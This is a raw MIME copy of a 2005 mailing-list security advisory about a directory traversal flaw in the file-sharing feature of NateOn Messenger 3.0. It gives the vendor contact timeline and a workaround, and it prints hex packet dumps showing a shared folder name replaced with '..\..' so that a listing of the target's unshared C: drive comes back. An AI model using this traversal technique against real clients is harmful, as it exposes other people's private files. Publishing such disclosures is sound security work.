This is a multi-part message in MIME format. ------=_NextPart_000_0026_01C586CF.3CA97D20 Content-Type: text/plain; charset="ks_c_5601-1987" Content-Transfer-Encoding: quoted-printable Dear F/D Mailing lists =20 Title: NateOn Messenger Version 3.0 Directory listing vulnerability Discoverer: PARK, GYU TAE (saintlinu@null2root.org) Advisory No.: NRVA05-02 Critical: Less critical Impact: Information disclosed by unauthorized user and DoS Where: From remote Operating System: Windows Only Solution: patched Workaround: Disable fileshare function until patched by vendor =20 Notice: 06. 20. 2005 initiate - No response 06. 23. 2005 2ND - No response 06. 27. 2005 Disclosure vulnerability 06. 29. 2005 Secunia notify and vendor responded 07. 0X. 2005. Patched (I don=A1=AFt know exactly = patched date bcoz vendor not inform to me) =20 Description:=20 The NateOn, twenties and thirties guys famous messenger in Korea, is Internet messenger such as MSN. There is vulnerability in FileShare.=20 When user shared some folder like a=A1=AEopenFolder=A1=AF then = registered friends can access that folder. Also we can access unshared folder like a=A1=AE%windir%=A1=AF. Because = NateOn believes user=A1=AFs modified request. =20 See following detail describe: =20 Target friend id is =A1=AEbuddyid=3D??????@nate.com=A1=AF Shared folder name is =A1=AEdebug=A1=AF =20 [recv] Message - ### Socket : 1088 / Content-Length : 9190 Content :=20 00 20 31 20 31 39 38 0D 0A 3C 66 6F 6C 64 65 72 . 1 198... 00 00 00 00 00 00 ...... =20 ---------------------------------------------------------------- =20 We received target user=A1=AFs shared folder information.=20 But we can modify send packet using Win32API CraeteRemoteThread Just substituted =A1=AEdebug=A1=AF to =A1=AE..\..=A1=AF =20 [send] Message - ### Socket : 1088 / Content-Length : 25 Content :=20 46 4C 52 4D 20 32 20 46 49 4C 45 5F 4C 49 53 54 FLRM 2 FILE_LIST 20 31 20 31 20 32 38 0D 0A 1 1 28.. =20 [send] Message - ### Socket : 1088 / Content-Length : 28 Content :=20 30 20 XX XX XX XX XX XX XX XX 40 6E 61 74 65 2E 0 YYYYYYYY@nate. 63 6F 6D 20 43 3A 5C 2E 2E 5C 2E 2E com C:\..\.. =20 ---------------------------------------------------------------- You can see the below messages.=20 =20 [recv] Message - ### Socket : 1088 / Content-Length : 9216 Content :=20 00 4C 52 4D 20 31 20 46 49 4C 45 5F 4C 49 53 54 .LRM 1 FILE_LIST 20 31 20 31 20 39 38 31 0D 0A 3C 66 69 6C 65 6C 1 1 981..< 66 69 6C 65 20 6E 61 6D 65 3D 27 41 55 54 4F 45 file name=3D'AUTOE 58 45 43 2E 42 41 54 27 20 73 69 7A 65 3D 27 30 XEC.BAT' size=3D'0 27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 2D ' date=3D'2004-09- 31 35 20 31 36 3A 34 32 3A 30 37 27 20 69 73 66 15 16:42:07' isf 6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 older=3D'n'/>. 00 00 00 00 00 00 ...... =20 buddy id =3D YYYYYY@nate.com Requested directory =3D 'C:\..\..' File lists on unshared directory =20 . =20 ---------------------[cut = cut]---------------------------------------------- =20 Thanks my Null@Root members =20 PS. I=A1=AFm very sorry for my poor English =20 Cheers ------=_NextPart_000_0026_01C586CF.3CA97D20 Content-Type: text/html; charset="ks_c_5601-1987" Content-Transfer-Encoding: quoted-printable

Dear F/D Mailing = lists

 

Title:          = ;     NateOn Messenger Version 3.0 Directory listing = vulnerability

Discoverer:        PARK, GYU TAE (saintlinu@null2root.org)

Advisory No.:      = NRVA05-02

Critical:            Less critical

Impact:         &nbs= p;  Information disclosed by unauthorized user and = DoS

Where:          = ;   >>From remote

Operating System:  Windows = Only

Solution:             patched

Workaround:         Disable fileshare function until patched by = vendor

 

Notice:         &nbs= p;  06. 20. 2005 initiate – No response

           = ;         06. 23. 2005 2ND – No response

           = ;         06. 27. 2005 Disclosure vulnerability

           = ;      06. 29. 2005 Secunia notify and vendor = responded

           = ;      07. 0X. 2005. Patched (I don=A1=AFt know exactly patched date bcoz = vendor not inform to me)

 

Description: =

The NateOn, twenties and thirties = guys famous messenger in Korea, is Internet messenger such as MSN.

There is vulnerability in = FileShare.

When user shared some folder like a=A1=AEopenFolder=A1=AF then registered friends can access that = folder.

Also we can access unshared = folder like a=A1=AE%windir%=A1=AF. Because NateOn believes user=A1=AFs modified = request.

 

See following detail = describe:

 

Target friend id is = =A1=AEbuddyid=3D??????@nate.com=A1=AF

Shared folder name is = =A1=AEdebug=A1=AF

 

[recv] Message - ### Socket : = 1088 / Content-Length : 9190

Content : =

00 20 31 20 31 39 38 0D 0A 3C 66 = 6F 6C 64 65 72 . 1 198..<folder

6C 69 73 74 20 6E 61 6D 65 3D 27 = B3 CA B8 B8 BF list name=3D'.....

CD 27 20 62 75 64 64 79 69 64 3D = 27 XX XX XX XX .' buddyid=3D'XXXX

XX XX 40 6E 61 74 65 2E 63 6F 6D = 27 20 74 79 70 XX@nate.com' typ

65 3D 27 30 27 3E 3C 66 6F 6C 64 = 65 72 69 6E 66 e=3D'0'><folderinf

6F 20 6E 61 6D 65 3D 27 2B 5F 2B = 27 20 61 75 74 o name=3D'+_+' aut

68 6F 72 69 74 79 3D 27 32 27 20 = 66 6F 6C 64 65 hority=3D'2' folde

72 69 64 3D 27 30 27 20 66 6F 6C = 64 65 72 70 61 rid=3D'0' folderpa

74 68 3D 27 43 3A 5C 64 65 62 75 = 67 27 20 63 6F th=3D'C:\debug' co

6D 6D 65 6E 74 3D 27 2B 5F 2B 27 = 20 61 64 64 64 mment=3D'+_+' addd

61 74 65 3D 27 32 30 30 35 30 35 = 32 36 31 37 35 ate=3D'20050526175

32 33 37 27 3E 3C 2F 66 6F 6C 64 = 65 72 69 6E 66 237'></folderinf

6F 3E 3C 2F 66 6F 6C 64 65 72 6C = 69 73 74 3E 00 o></folderlist>.

00 00 00 00 00 00            = ;            =        ......

 

----------------------------------------------------------------<= o:p>

 

We received target user=A1=AFs = shared folder information.

But we can modify send packet = using Win32API CraeteRemoteThread

Just substituted =A1=AEdebug=A1=AF to =A1=AE..\..=A1=AF

 

[send] Message - ### Socket : = 1088 / Content-Length : 25

Content : =

46 4C 52 4D 20 32 20 46 49 4C 45 = 5F 4C 49 53 54 FLRM 2 FILE_LIST

20 31 20 31 20 32 38 0D 0A            = ;           1 1 28..

 

[send] Message - ### Socket : = 1088 / Content-Length : 28

Content : =

30 20 XX XX XX XX XX XX XX XX 40 = 6E 61 74 65 2E 0 YYYYYYYY@nate.

63 6F 6D 20 43 3A 5C 2E 2E 5C 2E 2E            = ; com C:\..\..

 

----------------------------------------------------------------<= o:p>

You can see the below messages. =

 

[recv] Message - ### Socket : = 1088 / Content-Length : 9216

Content : =

00 4C 52 4D 20 31 20 46 49 4C 45 = 5F 4C 49 53 54 .LRM 1 FILE_LIST

20 31 20 31 20 39 38 31 0D 0A 3C = 66 69 6C 65 6C  1 1 981..<filel

69 73 74 20 69 64 3D 27 XX XX XX = XX XX XX 40 6E ist id=3D'XXXXXX@n

61 74 65 2E 63 6F 6D 27 20 61 75 = 74 68 3D 27 32 ate.com' auth=3D'2

27 20 70 61 74 68 3D 27 43 3A 5C = 2E 2E 5C 2E 2E ' path=3D'C:\..\..

27 20 66 6F 6C 64 65 72 69 64 3D = 27 30 27 3E 3C ' folderid=3D'0'><

66 69 6C 65 20 6E 61 6D 65 3D 27 = 41 55 54 4F 45 file name=3D'AUTOE

58 45 43 2E 42 41 54 27 20 73 69 = 7A 65 3D 27 30 XEC.BAT' size=3D'0

27 20 64 61 74 65 3D 27 32 30 30 = 34 2D 30 39 2D ' date=3D'2004-09-

31 35 20 31 36 3A 34 32 3A 30 37 = 27 20 69 73 66 15 16:42:07' isf

6F 6C 64 65 72 3D 27 6E 27 2F 3E = 3C 66 69 6C 65 older=3D'n'/><file

20 6E 61 6D 65 3D 27 43 4F 4E 46 = 49 47 2E 53 59  name=3D'CONFIG.SY

53 27 20 73 69 7A 65 3D 27 30 27 = 20 64 61 74 65 S' size=3D'0' date

3D 27 32 30 30 34 2D 30 39 2D 31 = 35 20 31 36 3A =3D'2004-09-15 16:

34 32 3A 30 37 27 20 69 73 66 6F = 6C 64 65 72 3D 42:07' isfolder=3D

27 6E 27 2F 3E 3C 66 69 6C 65 20 = 6E 61 6D 65 3D 'n'/><file name=3D

27 64 65 73 6B 74 6F 70 5F 61 75 = 64 69 74 2E 74 'desktop_audit.t

78 74 27 20 73 69 7A 65 3D 27 32 = 30 38 34 27 20 xt' size=3D'2084'

64 61 74 65 3D 27 32 30 30 35 2D = 30 35 2D 32 34 date=3D'2005-05-24

20 30 30 3A 32 32 3A 32 38 27 20 = 69 73 66 6F 6C  00:22:28' isfol

64 65 72 3D 27 6E 27 2F 3E 3C 66 = 69 6C 65 20 6E der=3D'n'/><file n

61 6D 65 3D 27 64 6E 2E 76 62 73 = 27 20 73 69 7A ame=3D'dn.vbs' siz

65 3D 27 33 32 34 27 20 64 61 74 = 65 3D 27 32 30 e=3D'324' date=3D'20

30 34 2D 31 30 2D 32 30 20 31 38 = 3A 33 31 3A 33 04-10-20 18:31:3

38 27 20 69 73 66 6F 6C 64 65 72 = 3D 27 6E 27 2F 8' isfolder=3D'n'/

3E 3C 66 69 6C 65 20 6E 61 6D 65 = 3D 27 65 64 69 ><file name=3D'edi

2E 65 78 65 27 20 73 69 7A 65 3D = 27 33 32 37 36 .exe' size=3D'3276

38 27 20 64 61 74 65 3D 27 32 30 = 30 34 2D 31 30 8' date=3D'2004-10

2D 32 30 20 31 38 3A 30 37 3A 30 = 35 27 20 69 73 -20 18:07:05' is

66 6F 6C 64 65 72 3D 27 6E 27 2F = 3E 3C 66 69 6C folder=3D'n'/><fil

65 20 6E 61 6D 65 3D 27 6D 73 30 = 34 2D 30 33 32 e name=3D'ms04-032

2E 77 6D 66 27 20 73 69 7A 65 3D = 27 35 37 36 27 .wmf' size=3D'576'

20 64 61 74 65 3D 27 32 30 30 34 = 2D 31 30 2D 32  date=3D'2004-10-2

30 20 31 38 3A 33 33 3A 34 31 27 = 20 69 73 66 6F 0 18:33:41' isfo

6C 64 65 72 3D 27 6E 27 2F 3E 3C = 66 69 6C 65 20 lder=3D'n'/><file

6E 61 6D 65 3D 27 63 6F 6E 63 65 = 72 74 27 20 73 name=3D'concert' s

69 7A 65 3D 27 30 27 20 64 61 74 = 65 3D 27 32 30 ize=3D'0' date=3D'20

30 34 2D 31 30 2D 32 30 20 31 35 = 3A 31 32 3A 35 04-10-20 15:12:5

37 27 20 69 73 66 6F 6C 64 65 72 = 3D 27 79 27 2F 7' isfolder=3D'y'/

3E 3C 66 69 6C 65 20 6E 61 6D 65 = 3D 27 64 65 62 ><file name=3D'deb

75 67 27 20 73 69 7A 65 3D 27 30 = 27 20 64 61 74 ug' size=3D'0' dat

65 3D 27 32 30 30 35 2D 30 35 2D = 32 33 20 31 32 e=3D'2005-05-23 12

3A 34 38 3A 33 37 27 20 69 73 66 = 6F 6C 64 65 72 :48:37' isfolder

3D 27 79 27 2F 3E 3C 66 69 6C 65 = 20 6E 61 6D 65 =3D'y'/><file name

3D 27 44 6F 63 75 6D 65 6E 74 73 = 20 61 6E 64 20 =3D'Documents and

53 65 74 74 69 6E 67 73 27 20 73 = 69 7A 65 3D 27 Settings' size=3D'

30 27 20 64 61 74 65 3D 27 32 30 = 30 34 2D 30 39 0' date=3D'2004-09

2D 31 35 20 31 37 3A 30 39 3A 31 = 34 27 20 69 73 -15 17:09:14' is

66 6F 6C 64 65 72 3D 27 79 27 2F = 3E 3C 66 69 6C folder=3D'y'/><fil

65 20 6E 61 6D 65 3D 27 50 72 6F = 67 72 61 6D 20 e name=3D'Program

46 69 6C 65 73 27 20 73 69 7A 65 = 3D 27 30 27 20 Files' size=3D'0'

64 61 74 65 3D 27 32 30 30 35 2D = 30 35 2D 32 36 date=3D'2005-05-26

20 30 38 3A 30 36 3A 31 31 27 20 = 69 73 66 6F 6C  08:06:11' isfol

64 65 72 3D 27 79 27 2F 3E 3C 66 = 69 6C 65 20 6E der=3D'y'/><file n

61 6D 65 3D 27 74 65 73 74 27 20 = 73 69 7A 65 3D ame=3D'test' size=3D

27 30 27 20 64 61 74 65 3D 27 32 = 30 30 35 2D 30 '0' date=3D'2005-0

34 2D 32 30 20 31 34 3A 31 35 3A = 34 39 27 20 69 4-20 14:15:49' i

73 66 6F 6C 64 65 72 3D 27 79 27 = 2F 3E 3C 66 69 sfolder=3D'y'/><fi

6C 65 20 6E 61 6D 65 3D 27 57 49 = 4E 44 4F 57 53 le name=3D'WINDOWS

27 20 73 69 7A 65 3D 27 30 27 20 = 64 61 74 65 3D ' size=3D'0' date=3D

27 32 30 30 34 2D 31 30 2D 32 30 = 20 31 36 3A 30 '2004-10-20 16:0

30 3A 31 37 27 20 69 73 66 6F 6C = 64 65 72 3D 27 0:17' isfolder=3D'

79 27 2F 3E 3C 2F 66 69 6C 65 6C = 69 73 74 3E 00 y'/></filelist>.

00 00 00 00 00 00            = ;            =        ......

 

buddy id =3D = YYYYYY@nate.com

Requested directory =3D 'C:\..\..'

File lists on unshared = directory

 

<filelist = id=3D'YYYYYY@nate.com' auth=3D'2' path=3D'C:\..\..' = folderid=3D'0'>

<file name=3D'AUTOEXEC.BAT'        &nbs= p;  size=3D'0'     date=3D'2004-09-15 16:42:07' = isfolder=3D'n'/>

<file name=3D'CONFIG.SYS'         =     size=3D'0'     date=3D'2004-09-15 16:42:07' = isfolder=3D'n'/>

<file name=3D'desktop_audit.txt'      = size=3D'2084'  date=3D'2005-05-24 00:22:28' isfolder=3D'n'/>

<file name=3D'dn.vbs'         &nbs= p;       size=3D'324'   date=3D'2004-10-20 18:31:38' = isfolder=3D'n'/>

<file name=3D'edi.exe'         &nb= sp;      size=3D'32768' date=3D'2004-10-20 18:07:05' = isfolder=3D'n'/>

<file name=3D'ms04-032.wmf'        &nbs= p;  size=3D'576'   date=3D'2004-10-20 18:33:41' = isfolder=3D'n'/>

<file name=3D'concert'         &nb= sp;      size=3D'0'     date=3D'2004-10-20 15:12:57' = isfolder=3D'y'/>

<file name=3D'debug'          = ;        size=3D'0'     date=3D'2005-05-23 12:48:37' = isfolder=3D'y'/>

<file name=3D'Documents and = Settings' size=3D'0'     date=3D'2004-09-15 17:09:14' = isfolder=3D'y'/>

<file name=3D'Program Files'          size=3D'0'     date=3D'2005-05-26 08:06:11' = isfolder=3D'y'/>

<file name=3D'test'          =          size=3D'0'     date=3D'2005-04-20 14:15:49' = isfolder=3D'y'/>

<file name=3D'WINDOWS'         &nb= sp;      size=3D'0'     date=3D'2004-10-20 16:00:17' = isfolder=3D'y'/>

</filelist>.

 

---------------------[cut cut]----------------------------------------------

 

Thanks my Null@Root = members

 

PS. I=A1=AFm very sorry for my poor = English

 

Cheers

------=_NextPart_000_0026_01C586CF.3CA97D20-- ________________________________________________________ ¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr) ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com) ´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)